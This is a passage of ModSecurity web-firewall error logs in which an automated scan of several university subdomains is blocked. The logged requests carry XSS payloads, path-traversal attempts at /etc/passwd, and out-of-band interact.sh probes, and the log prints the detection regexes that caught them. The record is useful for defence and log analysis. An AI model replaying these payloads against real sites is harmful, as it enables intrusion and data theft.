"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoVqpkAAAAH"]
[Tue Aug 29 11:52:49.551876 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAnTlVkAAAAA"]
[Tue Aug 29 11:52:49.588104 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAlUlxMAAAA0"]
[Tue Aug 29 11:52:49.589083 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoVqpoAAAAH"]
[Tue Aug 29 11:52:49.598793 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/user/register"] [unique_id "ZO15ocCo-f0AAAmQ-3cAAAAb"]
[Tue Aug 29 11:52:49.608972 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAoVqpsAAAAH"]
[Tue Aug 29 11:52:49.609563 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAoT7Q8AAAAD"]
[Tue Aug 29 11:52:49.613353 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAoLfLcAAAAG"]
[Tue Aug 29 11:52:49.621007 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAfWOSIAAAAL"]
[Tue Aug 29 11:52:49.621221 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15ocCo-f0AAAoW7JMAAAAJ"]
[Tue Aug 29 11:52:49.628081 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoO548AAAAK"]
[Tue Aug 29 11:52:49.639566 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoLfLgAAAAG"]
[Tue Aug 29 11:52:49.651727 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15ocCo-f0AAAoO55AAAAAK"]
[Tue Aug 29 11:52:49.668631 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAnd3NEAAAAI"]
[Tue Aug 29 11:52:49.672602 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAfWOSQAAAAL"]
[Tue Aug 29 11:52:50.564733 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15osCo-f0AAAmQ-3sAAAAb"]
[Tue Aug 29 11:52:50.568806 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15osCo-f0AAAoLfLoAAAAG"]
[Tue Aug 29 11:52:50.604039 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15osCo-f0AAAoPuZ4AAAAM"]
[Tue Aug 29 11:52:50.676290 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15osCo-f0AAAoQ3NwAAAAN"]
[Tue Aug 29 11:52:50.702800 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15osCo-f0AAAmQ-30AAAAb"]
[Tue Aug 29 11:52:50.723448 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15osCo-f0AAAoGFb8AAAAE"]
[Tue Aug 29 11:52:50.729720 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15osCo-f0AAAnTlV8AAAAA"]
[Tue Aug 29 11:52:51.381096 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15o8Co-f0AAAnHQpQAAAAT"]
[Tue Aug 29 11:52:51.832214 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15o8Co-f0AAAnHQpUAAAAT"]
[Tue Aug 29 11:52:51.833360 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15o8Co-f0AAAoVqqEAAAAH"]
[Tue Aug 29 11:52:51.845545 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15o8Co-f0AAAoT7RYAAAAD"]
[Tue Aug 29 11:52:51.922126 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15o8Co-f0AAAnHQpgAAAAT"]
